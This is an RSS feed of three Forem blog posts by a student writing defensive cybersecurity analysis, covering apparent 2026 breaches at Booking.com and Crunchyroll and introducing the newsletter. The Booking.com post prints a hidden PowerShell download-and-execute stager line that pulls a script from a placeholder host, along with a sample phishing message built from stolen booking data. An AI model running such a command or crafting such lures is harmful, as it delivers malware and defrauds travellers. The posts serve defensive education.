<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Bulut Caner</title>
    <description>The latest articles on Forem by Bulut Caner (@cnrco).</description>
    <link>https://forem.com/cnrco</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3882479%2F59116331-d1ee-4673-a8fa-40e7a08389a2.png</url>
      <title>Forem: Bulut Caner</title>
      <link>https://forem.com/cnrco</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/cnrco"/>
    <language>en</language>
    <item>
      <title>Booking.com Got Breached. Your Reservation Was the Weapon.</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Mon, 20 Apr 2026 11:05:18 +0000</pubDate>
      <link>https://forem.com/cnrco/bookingcom-got-breached-your-reservation-was-the-weapon-45hf</link>
      <guid>https://forem.com/cnrco/bookingcom-got-breached-your-reservation-was-the-weapon-45hf</guid>
      <description>&lt;p&gt;On April 13th, 2026, online travel agency Booking.com issued a major notification that echoed back to 2021. There was unauthorized access to customer PII (Personally Identifiable Information). After the breach, their Public Relations team immediately stated that financial information was not accessed by the threat actors.&lt;/p&gt;

&lt;p&gt;The breach most likely did not hit Booking.com’s core servers; in fact, it hit their supply chain. The supply chain, in this case, refers to the network of partner hotels with a connection to Booking.com. If the hackers can’t or choose not to hack the “big bank”, they go to its local branches. The threat actors likely used a tactic called ClickFix, where they might have tricked the hotel staff into running a malicious script, under the guise of “fixing” a browser error, that later steals their session cookies. Session cookies are the digital ID within your browser that keeps you logged in. When a hacker steals this, they automatically bypass the need for a password and Multi-Factor Authentication completely. To know how malware gets into a system, we need to look at a stager. A stager is a small piece of code whose job is to download a malicious payload. The stager is like a delivery tool for the harmful code. The malware is thus the harmful code that the stager downloads.&lt;/p&gt;

&lt;p&gt;Disclaimer: The following code is purely for representation and provided with the intention of educational display.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="c"&gt;# CONCEPTUAL REPRESENTATION ONLY — educational purposes&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="c"&gt;# Modern EDR/AMSI solutions would flag and block this immediately.&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;powershell.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ExecutionPolicy&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Bypass&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-WindowStyle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Hidden&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Command&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"iex(New-Object Net.WebClient).DownloadString('https://example.com/malicious-script.ps1')"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nt"&gt;-ExecutionPolicy&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Bypass:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Tells&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;system&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;ignore&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;local&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;script&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;restrictions.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;iex (Invoke-Expression): A common "red flag" command that runs downloaded code directly in the computer's memory.&lt;br&gt;
Although only non-financial data was breached, it is still dangerous and a major threat. Attackers can take the stolen PII and use it to make up a lie that can seem impossible to ignore. Because the threat actor knows your check-in date, hotel name and more information about the registration, you believe the message is actually real.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"guest_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Jane Smith"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"booking_ref"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"BK-99210"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"check_in"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"2026-05-14"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"hotel_name"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"Seaside Resort"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The message can look something like this: &lt;em&gt;“Hi Jane, your booking BK-99210 for May 14th is at risk. Please verify your payment over here so we can save your booking details.”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Booking.com had a similar breach to this back in 2021 and it was fined €475,000 under the General Data Protection Regulation, a European law that can hit companies with massive fines if they lose customer/user data.&lt;/p&gt;

&lt;p&gt;You do not have to be a tech giant such as Booking.com to be targeted. Small businesses are often used, and have been used in the past, as a bridge to leap over to bigger targets or their customers’ wallets. As you can see, this breach was not considered to be high tech but more of a simple one. The humans were the ones exploited, along with the companies’ data systems. Tackling such session hijacking and supply chain vulnerabilities can involve many measures. First of all, you can ensure that your web applications support Device Bound Session Credentials (DBSC). DBSC cryptographically binds a session to the device’s Trusted Platform Module (TPM). Because the private key never leaves the original hardware, the session becomes invalid when an attacker tries to exfiltrate the cookie to another machine. Another good measure could be enabling PowerShell Constrained Language Mode and blocking the -ExecutionPolicy Bypass flag for non-admin users.&lt;/p&gt;

&lt;p&gt;A good takeaway from this breach could be: if you wait for the attack to develop before you secure your systems and partners, you have already lost the battle. Defense must also begin when everything is silent.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>When Third Party Support Becomes Your Weakest Point: April 2026 Security Breach</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Thu, 16 Apr 2026 12:56:14 +0000</pubDate>
      <link>https://forem.com/cnrco/when-third-party-support-becomes-your-weakest-point-april-2026-security-breach-1f5c</link>
      <guid>https://forem.com/cnrco/when-third-party-support-becomes-your-weakest-point-april-2026-security-breach-1f5c</guid>
      <description>&lt;p&gt;On March 12, 2026, threat actors got into Crunchyroll’s support system by putting malware on a Telus International support agent’s computer and stealing their login details. With one login they could get into many internal systems like Zendesk, Gmail, Slack and Jira.&lt;br&gt;
The attackers’ main goal was Crunchyroll’s support system, Zendesk. This software helps manage customer requests in one place. Within 24 hours they downloaded 8 million support tickets. These tickets contained information such as customer names, emails, IP addresses and locations.&lt;/p&gt;

&lt;p&gt;The attackers demanded $5 million. When Crunchyroll didn’t pay, they leaked the data on April 4. Companies that do work for others, like BPOs, are major targets. If one employee’s computer gets compromised, the bad actors can get into multiple companies at once. Crunchyroll’s systems lacked basic defenses such as API rate limiting, anomaly detection and real-time monitoring. What would have prevented this breach, or at least made it less severe, is blocking bulk downloads, flagging unusual access patterns, hardware multi-factor authentication and network segmentation. This is not new either. Discord, Marks &amp;amp; Spencer, Co-op, and others have been hit the same way. Therefore, until companies audit BPO permissions and implement zero-trust controls, expect more breaches.&lt;/p&gt;

&lt;p&gt;There was probably no reason for a support agent to have full access to Jira, Slack, Gmail and Zendesk at the same time. This suggests that the company failed to control who had access to what, giving agents more access than they needed for their job. Beyond password theft, the hackers likely used malware to steal session cookies. These cookies let attackers pretend to be logged in, bypassing multi-factor authentication. The damage goes beyond the initial $5 million ransom demand. With eight million tickets leaked, the risk now is that attackers will use this information to send emails to trick users into giving away credit card details or login credentials. For the company that was breached, the fallout is huge, showing a failure in endpoint security that allowed malware to persist undetected.&lt;/p&gt;

&lt;p&gt;To prevent these kinds of attacks, companies need to change how they think about security. They need to move away from trusting vendors and toward a Zero Trust system. This starts with giving access only to the specific application needed for a task. If an agent is working in Zendesk, they should not be able to see the Jira login page. Companies should also require hardware-based multi-factor authentication, like physical security keys. These devices are much harder to hack than SMS or app-based codes. Data loss prevention must also be reinforced with API rate limiting and behavioral monitoring. The fact that millions of tickets were downloaded within a single day points to a lack of checks in the system. Security protocols should limit the number of records a single user can pull in a given timeframe.&lt;br&gt;
For sensitive roles, companies can eliminate the risk of local device compromise by using Virtual Desktop Infrastructure (VDI) or managed enterprise browsers. In a VDI environment, the agent logs into a machine managed by the parent company, ensuring that no data lives on the agent’s hardware.&lt;br&gt;
Finally, security must be treated as a contractual obligation, not just a technical one. Organizations must implement third-party audits and “right-to-audit” clauses that allow for unannounced security scans of a vendor’s endpoint hygiene. Service Level Agreements should include financial penalties if a breach results from a vendor’s failure to maintain basic defenses. By treating BPO employees as high-risk users and wrapping their access in these layers of friction, companies can prioritize data safety.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>data</category>
      <category>hack</category>
      <category>security</category>
    </item>
    <item>
      <title>Why a High School Student is Covering Defensive Cybersecurity</title>
      <dc:creator>Bulut Caner</dc:creator>
      <pubDate>Thu, 16 Apr 2026 12:47:19 +0000</pubDate>
      <link>https://forem.com/cnrco/why-a-high-school-student-is-covering-defensive-cybersecurity-2225</link>
      <guid>https://forem.com/cnrco/why-a-high-school-student-is-covering-defensive-cybersecurity-2225</guid>
      <description>&lt;p&gt;I’m 16. I recently started discovering cybersecurity purely out of curiosity, to see what it’s like protecting yourself and others from cybercriminals before it becomes a bigger problem within society. The deeper I delved into this field, the more I saw that I needed to learn more, to fully comprehend how computers communicate, before understanding how they’re exploited.&lt;/p&gt;

&lt;p&gt;About me: In two years I would like to study cybersecurity &amp;amp; cybercrime at a university. This newsletter will be me documenting multiple aspects of cybersecurity to document how breaches happen globally and what we can learn from them. Many angles will be discovered such as defensive security analysis, the attack prevention measures of organizations, what went wrong and how it could possibly have been prevented. I am currently the Head of Technics of our MUN organization, where I built and deployed a website from scratch. Within the process I learned web design, web development and DNS configuration of our custom domain.&lt;/p&gt;

&lt;p&gt;Defense Stack, The Security Analysis Newsletter by a high school student: The first posts will break down recent cybersecurity breaches, what happened, how attackers got in, as well as what defensive measures could help stop it. If you’re curious about cybersecurity, learning alongside me, or just want to understand what’s happening in the digital threat landscape, you may want to join me. This will be a long journey and I am going to extract as much information as I can.&lt;/p&gt;

&lt;p&gt;— First Publication of Defense Stack &amp;gt;_&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>data</category>
      <category>cli</category>
    </item>
  </channel>
</rss>
